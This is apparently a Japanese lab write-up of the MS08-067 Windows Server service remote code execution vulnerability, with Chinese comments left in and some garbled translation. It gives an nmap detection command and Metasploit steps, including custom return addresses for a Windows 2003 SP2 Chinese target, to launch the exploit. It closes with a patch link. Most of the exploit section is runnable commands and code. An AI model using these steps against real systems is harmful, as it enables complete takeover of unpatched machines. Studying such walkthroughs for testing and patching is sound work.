脆弱性の説明
Windowsシステムのサーバーサービスにリモートコード実行の脆弱性が存在します。この脆弱性は、サービスが特別に細工されたRPC要求を誤って処理することによって引き起こされます。この脆弱性の悪用に成功した攻撃者は、影響を受けるシステムを完全に制御する可能性があります。
影響システム
- Windows Vista
- Windows2000サービス
- Windows Server 2008
- Windows Server 2003
- Windows XP
脆弱性の検出
脆弱性検出のためのNmap
#nmap 目标ip --script=smb-vuln-ms08-067.nse
nmap 192.168.234.129 --script=smb-vuln-ms08-067.nse
VULNERABLE
脆弱性が存在することを促す
エクスプロイト
エクスプロイトツールはmsfであり、私が再現したシステムはWindows Server 2003SP2の中国語版です。しかし、msfには中国語版のexpフレームワークがないことがわかりました。
エクスプロイトコードを追加します。
#修改msf漏洞利用代码
vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi.rb
次のコンテンツを追加します。
[ 'Windows 2003 SP2 Chinese (NX)',
{
'RetDec' => 0x7c99beb8, # dec ESI, ret @NTDLL.DLL (0x4EC3)
'RetPop' => 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
'JmpESP' => 0x7c99a01b, # jmp ESP @NTDLL.DLL(0xFFE4)
'DisableNX' => 0x7c96f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
#进入msf
msfconsole
#查找漏洞框架并调用
search ms08-067
use exploit/windows/smb/ms08_067_netapi
system expフレームワークを表示すると、追加したものを確認できますwindwos 2003 SP2 Chinese
show targets
ターゲットIPおよびその他のパラメータを設定すると、攻撃を開始できます
set target 1
set rhost 192.168.234.129
show options
脆弱性の強化
MicrosoftはMS08-067パッチをリリースしました:http://technet.microsoft.com/zh-cn/security/bulletin/ms08-067